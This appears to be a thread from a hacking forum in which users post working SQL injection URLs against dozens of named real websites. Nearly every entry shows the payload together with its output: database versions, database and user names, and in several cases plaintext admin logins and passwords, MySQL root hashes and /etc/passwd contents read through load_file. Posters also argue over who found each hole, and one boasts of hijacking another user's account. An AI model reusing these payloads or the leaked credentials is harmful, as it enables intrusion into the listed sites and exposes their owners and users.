http://www.lueffyworld.net/sport.php?id=-121+union+select+1,2,3,4,concat_ws(0x3a,user_id,username,user_password),6,7,8+from+phpbb_users/*
http://www.roofing.ru/news/text?newsid=-10+union+select+1,2,3,4,5,6,7 user(),database(),version(): roofing_admin@localhost::roofing_bcms::4.0.27-standard
PageRank = 7 Version: Microsoft SQL Server 2000 - 8.00.679 (Intel X86) Aug 26 2002 15:09:48 Copyright (c) 1988-2000 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4) User: dbase_user Database: fnag
<<myOpera>>
Code: http://forum.myopera.net/showflat.php?Cat=&Board=newsuser&Number=44645+and+ascii(substring(version(),1,1))=53--+
db: 5.0.27 name_db: myopera_myoperarum user: myopera_myopera@localhost
That doesn't say anything!!!!!! and it doesn't prove that it wasn't me who found it..... I'm just there under a different nick; what's more, I hijacked that user a week ago......
NOT FOUND BY YOU... If I could, I'd give it a "-"... http://forum.xakep.ru/fb.aspx?m=1483201 Maybe you did find it yourself, but it was posted earlier...
http://hip-hop.sib.net/music/download.php?id=100+and+substring(@@version,1,1)=4
http://sandpiperleads.com/warrenrupp_register/thanks.php?RegisterID=-9999+UNION+SELECT+user(),2,version()/*
<<Управления большими системами>> Code: http://ubs.mtas.ru/search/search_results.php?short_view=0&publication_id=-2621+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--+ db: 5.0.44-log name_db: mtas116_libr user: mtas116_libr@localhost
And again, blind sql-inj http://associate.hud.ac.uk/php/showpage.php?pageid=54+and+substring(version(),1,1)=5
<<Центр востоноаления зрения>> Code: http://www.cvz.ru/index.php?id=-10+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8--+ db: 4.1.22-log name_db: wwwcvzru_cmsmy user: cvz_cmsmy@localhost <<ТЕАТР.DOC>> Code: http://www.teatrdoc.ru/plays.php?id=-5+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5--+ db: 4.1.22 name_db: kinoteatr_td user: [email protected] <<Экозащита>> Code: http://ecodefense.ru/view.php?id=-431+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),database(),user()),11--+ db: 4.1.22 name_db: ecodefense user: ecodefensedb@localhost
«Информационные технологии и телерадиокоммуникации» - electronic journal - http://ittc.ksu.ru
Code: http://ittc.ksu.ru/?id=-29+union+select+1,concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10,11--
user(): ittcdb@localhost database(): ittcdb version(): 5.0.67 PR=4
Reading the tables:
Code: http://ittc.ksu.ru/?id=-29+union+select+1,table_name,3,4,5,6,7,8,9,10,11+from+INFORMATION_schema.tables+limit+0,1--
Holistic Health Yellow Pages and Supersite
Code: http://www.findhealer.com/ref/docdetail.php3?id=-29+union+select+1,version(),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8--
user(): chinamed@localhost database(): chinamed version(): 4.1.21-standard PR=4
http://www.bulgariahousehunting.com/details.php?id=116+AND+SUBSTRING((y=1..3()),1,1)=x-- y1=version y2=database y3=user x=Version : 4.1.22-log Database : bulgar_house User : krasig@localhost
www.baspublishing.com.au
Code: http://www.baspublishing.com.au/detail.php?id=-1+union+all+select+0,1,concat_ws(0x3a,user,password,file_priv),3,4,5+from+mysql.user--
Login/pass:
Code: root:164378093c1aa083
file_priv - Y
Reads etc/passwd:
Code: http://www.baspublishing.com.au/detail.php?id=-1+union+all+select+0,1,load_file(0x2f6574632f706173737764),3,4,5+from+mysql.user--
Code:
# $FreeBSD: src/etc/master.passwd,v 1.25.2.1 2001/11/24 17:22:24 gshapiro Exp $
#
root:*:0:0:Charlie &:/root:/bin/bash
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system proces
The server is running FreeBSD.
------------------------------------------------------------------
The End!
http://travel.chinavista.com Code: http://travel.chinavista.com/culture2.php?id=1+union+select+1,table_name+from+information_schema.tables/*
http://www.transtriumf.com/line.php?id=-8+UNION+SELECT+1,2,3,4,5,6,7,8/* Database Version: 4.0.16-Max-log Database name: transtriumf User name: transtriumf@localhost
<<NovoNews>> Code: http://www.novonews.lv/index.php?mode=news&id=-70666'+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),database(),user()),12,13,14,15--+ db: 5.0.22-log name_db: novonews_v2 user: [email protected] log: dima pass: amid643 email: [email protected] http://www.novonews.lv/admin/index.php?login <<Стоматит>> Code: http://www.dentoprofile.ru/php/content.php?id=577+and+ascii(substring(version(),1,1))=52--+ database: 4.0.16 <<SFCB>> Code: http://www.sfcb.org/php/category.php?id=1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12/* db: 4.1.22 name_db: sfcb user: sfcbor@localhost <<AveDesk>> Code: http://www.avedesk.org/desklet.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10-- db: 5.0.67 name_db: dfilezon_avedesk user: dfilezon_ave@localhost log: addd pass: fff
Code: http://www.ausit.org/eng/showpage.php3?id=-650+union+select+concat_ws(0x20,version(),database(),user()),2,3 Database Version: 4.1.25-log Database name: ausit2 User name: dream@localhost
Code: http://www.conferencedes19cpas.irisnet.be/cpas2.php?id=4+union+select+1,unhex(hex(concat(version(),0x3a,database(),0x3a,user()))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+limit+1,1/* version():4.1.11-Debian_4sarge8-log database():db_cpasbru user():[email protected] __ Code: http://w3.iihe.ac.be/About_Us/ident_people_iihe.php?ID=8+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+mysql.user+limit+1,1/* version():5.0.27 database():IIHE user():root@localhost Code: http://w3.iihe.ac.be/About_Us/ident_people_iihe.php?ID=8+union+select+1,2,concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+mysql.user+limit+1,1/* root:710789ba2a55b808 Code: http://w3.iihe.ac.be/About_Us/ident_people_iihe.php?ID=8+union+select+1,2,load_file(%27/etc/passwd%27),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+mysql.user+limit+1,1/*
<<MAXIM>> Code: http://www.maxim-stroy.ru/catalog/index.php?id=-80+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,version(),database(),user()),9,10,11,12,13--+ db: 5.0.67-log name_db: u72532 user: [email protected] log: admin pass: max77
www.auroragroup.com.au
Columns from Information_schema:
Code: articles,galleries,photos,phplist_admin,phplist_admin_attribute,phplist_admin_task,phplist_adminattribute,phplist_attachment,phplist_bounce,phplist_bounceregex,phplist_bounceregex_bounce,phplist_config,phplist_eventlog,phplist_linktrack,phplist_linktrack_userclick,phplist_list,phplist_listmessage,phplist_listrss,phplist_listuser,phplist_message,phplist_message_attachment,phplist_messagedata,phplist_rssitem,phplist_rssitem_data,phplist_rssitem_user,phplist_sendprocess,phplist_subscribepage,phplist_subscribepage_data,phplist_task,phplist_template,phplist_templateimage,phplist_urlcache,phplist_user_attribute,phplist_user_blacklist,phplist_user_blacklist_data,phplist_user_message_bounce,phplist_user_message_forward,phplist_user_rss,phplist_user_user,phplist_user_user_attribute,php Return to gallery
The phplist_admin column caught my interest. Its structure:
Code: id,loginname,namelc,email,created,modified,modifiedby,password,passwordchanged,superuser,disabled
Output:
Code: http://www.auroragroup.com.au/viewphoto.php?id=-1+union+all+select+0,1,2,concat_ws(0x3a,id,loginname,namelc,email,created,modified,modifiedby,password,passwordchanged,superuser,disabled)+from+phplist_admin--
------------------------------------------------------------------------------------------------------
The End!